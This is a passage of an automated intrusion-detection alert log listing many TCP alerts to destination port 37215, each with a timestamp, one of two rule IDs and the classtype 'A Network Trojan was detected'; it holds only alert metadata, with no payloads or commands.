          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266031
          SID:2835222
          Source Port:34068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238082
          SID:2829579
          Source Port:54112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272883
          SID:2829579
          Source Port:54590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.795323
          SID:2829579
          Source Port:56980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067789
          SID:2835222
          Source Port:59080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741399
          SID:2835222
          Source Port:58940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843972
          SID:2829579
          Source Port:60420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742355
          SID:2835222
          Source Port:36616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.676290
          SID:2835222
          Source Port:35658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161366
          SID:2835222
          Source Port:34160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409660
          SID:2829579
          Source Port:41198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467662
          SID:2835222
          Source Port:47538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731729
          SID:2829579
          Source Port:54126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267804
          SID:2835222
          Source Port:58368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551375
          SID:2829579
          Source Port:48904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601489
          SID:2835222
          Source Port:54202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846447
          SID:2835222
          Source Port:59006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407062
          SID:2835222
          Source Port:59316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038069
          SID:2835222
          Source Port:53124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731970
          SID:2829579
          Source Port:41248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806694
          SID:2835222
          Source Port:45978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442101
          SID:2829579
          Source Port:47142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041067
          SID:2829579
          Source Port:50464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787383
          SID:2829579
          Source Port:59350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351071
          SID:2835222
          Source Port:51734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.801813
          SID:2835222
          Source Port:48116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405869
          SID:2829579
          Source Port:43726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516771
          SID:2835222
          Source Port:58794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601344
          SID:2835222
          Source Port:40956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159526
          SID:2835222
          Source Port:52128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180944
          SID:2829579
          Source Port:58246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813175
          SID:2829579
          Source Port:42718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743721
          SID:2829579
          Source Port:38292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554301
          SID:2829579
          Source Port:39978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406911
          SID:2829579
          Source Port:43756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797950
          SID:2835222
          Source Port:47474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445020
          SID:2829579
          Source Port:53036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671163
          SID:2829579
          Source Port:36814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860783
          SID:2829579
          Source Port:33008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410612
          SID:2835222
          Source Port:55722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185486
          SID:2829579
          Source Port:33804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549219
          SID:2835222
          Source Port:49238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816934
          SID:2835222
          Source Port:38886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606462
          SID:2829579
          Source Port:47368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108356
          SID:2829579
          Source Port:49442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243083
          SID:2829579
          Source Port:57728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468236
          SID:2829579
          Source Port:34920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791776
          SID:2829579
          Source Port:55714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672544
          SID:2835222
          Source Port:54984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.821079
          SID:2829579
          Source Port:41920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161078
          SID:2835222
          Source Port:57066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087419
          SID:2829579
          Source Port:55580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791727
          SID:2835222
          Source Port:47476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266422
          SID:2829579
          Source Port:45750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081744
          SID:2829579
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353114
          SID:2829579
          Source Port:50826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.154834
          SID:2835222
          Source Port:35798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152738
          SID:2835222
          Source Port:41324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240737
          SID:2829579
          Source Port:60062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306736
          SID:2835222
          Source Port:48286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271636
          SID:2835222
          Source Port:54432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040355
          SID:2835222
          Source Port:46204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238584
          SID:2829579
          Source Port:40906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.518360
          SID:2829579
          Source Port:56546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733754
          SID:2835222
          Source Port:49280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890686
          SID:2835222
          Source Port:46290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036556
          SID:2829579
          Source Port:40696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.156108
          SID:2835222
          Source Port:38988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465762
          SID:2829579
          Source Port:50296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129532
          SID:2829579
          Source Port:36182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299610
          SID:2829579
          Source Port:47534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815346
          SID:2829579
          Source Port:46182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108103
          SID:2829579
          Source Port:56666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861460
          SID:2829579
          Source Port:34742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128679
          SID:2835222
          Source Port:43692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896616
          SID:2835222
          Source Port:38896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448472
          SID:2829579
          Source Port:55438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783052
          SID:2835222
          Source Port:36148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127471
          SID:2835222
          Source Port:49306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241051
          SID:2829579
          Source Port:46798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306311
          SID:2835222
          Source Port:56090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113229
          SID:2835222
          Source Port:51166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808044
          SID:2835222
          Source Port:55378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115562
          SID:2835222
          Source Port:35034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800494
          SID:2829579
          Source Port:45980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018257
          SID:2835222
          Source Port:48728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547383
          SID:2835222
          Source Port:57944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604856
          SID:2829579
          Source Port:41068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709866
          SID:2835222
          Source Port:51212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237894
          SID:2829579
          Source Port:36538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783510
          SID:2835222
          Source Port:60844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555371
          SID:2835222
          Source Port:56584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736955
          SID:2835222
          Source Port:43798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262080
          SID:2829579
          Source Port:51122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173348
          SID:2835222
          Source Port:47512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019637
          SID:2835222
          Source Port:45740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745471
          SID:2829579
          Source Port:45966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177185
          SID:2835222
          Source Port:57268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731284
          SID:2835222
          Source Port:54030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842226
          SID:2835222
          Source Port:42868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846139
          SID:2829579
          Source Port:37304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732002
          SID:2829579
          Source Port:53896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548741
          SID:2835222
          Source Port:59706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796260
          SID:2835222
          Source Port:48364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126567
          SID:2835222
          Source Port:33970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513033
          SID:2829579
          Source Port:44812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793253
          SID:2835222
          Source Port:57968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897629
          SID:2835222
          Source Port:37528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463873
          SID:2829579
          Source Port:47950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159820
          SID:2829579
          Source Port:49816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892016
          SID:2829579
          Source Port:35650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444620
          SID:2835222
          Source Port:33464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005532
          SID:2829579
          Source Port:54788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600406
          SID:2835222
          Source Port:58944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741883
          SID:2835222
          Source Port:54904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180663
          SID:2835222
          Source Port:46370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510956
          SID:2835222
          Source Port:50152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746427
          SID:2829579
          Source Port:50938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014513
          SID:2835222
          Source Port:54462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516729
          SID:2829579
          Source Port:43376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268634
          SID:2829579
          Source Port:48084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272598
          SID:2829579
          Source Port:38612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853144
          SID:2835222
          Source Port:38774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460693
          SID:2829579
          Source Port:58534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671408
          SID:2829579
          Source Port:48124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800600
          SID:2829579
          Source Port:46346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108153
          SID:2835222
          Source Port:40738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733510
          SID:2835222
          Source Port:50044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356708
          SID:2835222
          Source Port:56602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448836
          SID:2829579
          Source Port:48288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020888
          SID:2835222
          Source Port:57290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.074985
          SID:2829579
          Source Port:57738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466364
          SID:2835222
          Source Port:58986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788156
          SID:2835222
          Source Port:47568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178495
          SID:2829579
          Source Port:50656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173412
          SID:2835222
          Source Port:37202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738539
          SID:2835222
          Source Port:38428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542803
          SID:2835222
          Source Port:39492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707466
          SID:2829579
          Source Port:45880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174170
          SID:2829579
          Source Port:47194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407854
          SID:2835222
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788464
          SID:2835222
          Source Port:43988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403808
          SID:2829579
          Source Port:55248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408254
          SID:2829579
          Source Port:48110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495854
          SID:2835222
          Source Port:38856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188398
          SID:2829579
          Source Port:60884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463125
          SID:2829579
          Source Port:55042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407012
          SID:2835222
          Source Port:51542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160619
          SID:2829579
          Source Port:40892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444986
          SID:2829579
          Source Port:39866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.881250
          SID:2829579
          Source Port:40678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185564
          SID:2829579
          Source Port:57064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850417
          SID:2835222
          Source Port:34372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832419
          SID:2835222
          Source Port:56720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741229
          SID:2829579
          Source Port:48912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549996
          SID:2829579
          Source Port:60268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448518
          SID:2829579
          Source Port:34476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087434
          SID:2829579
          Source Port:33882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166581
          SID:2829579
          Source Port:33808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460622
          SID:2829579
          Source Port:44760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172543
          SID:2829579
          Source Port:52668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513596
          SID:2829579
          Source Port:54144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408598
          SID:2835222
          Source Port:46648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180066
          SID:2829579
          Source Port:56274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133799
          SID:2835222
          Source Port:52330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264495
          SID:2835222
          Source Port:59722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465819
          SID:2835222
          Source Port:44488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353425
          SID:2835222
          Source Port:42400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.902394
          SID:2835222
          Source Port:38878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788326
          SID:2835222
          Source Port:46228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446470
          SID:2835222
          Source Port:60740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782754
          SID:2835222
          Source Port:35088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705031
          SID:2835222
          Source Port:44932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741342
          SID:2829579
          Source Port:33018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160498
          SID:2835222
          Source Port:55356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042617
          SID:2829579
          Source Port:38262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107278
          SID:2829579
          Source Port:56796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887940
          SID:2829579
          Source Port:37144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.605958
          SID:2835222
          Source Port:40006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352600
          SID:2835222
          Source Port:51762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706729
          SID:2829579
          Source Port:50042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446790
          SID:2829579
          Source Port:60868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131786
          SID:2835222
          Source Port:52902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355370
          SID:2829579
          Source Port:43638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549236
          SID:2835222
          Source Port:58100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044255
          SID:2829579
          Source Port:37810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884174
          SID:2829579
          Source Port:60250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729870
          SID:2835222
          Source Port:50584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113749
          SID:2829579
          Source Port:33746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709601
          SID:2829579
          Source Port:55162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155424
          SID:2829579
          Source Port:35472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021008
          SID:2835222
          Source Port:51022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161242
          SID:2835222
          Source Port:53622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.147006
          SID:2829579
          Source Port:38908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173778
          SID:2835222
          Source Port:55796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.099488
          SID:2835222
          Source Port:42526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542304
          SID:2835222
          Source Port:57924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
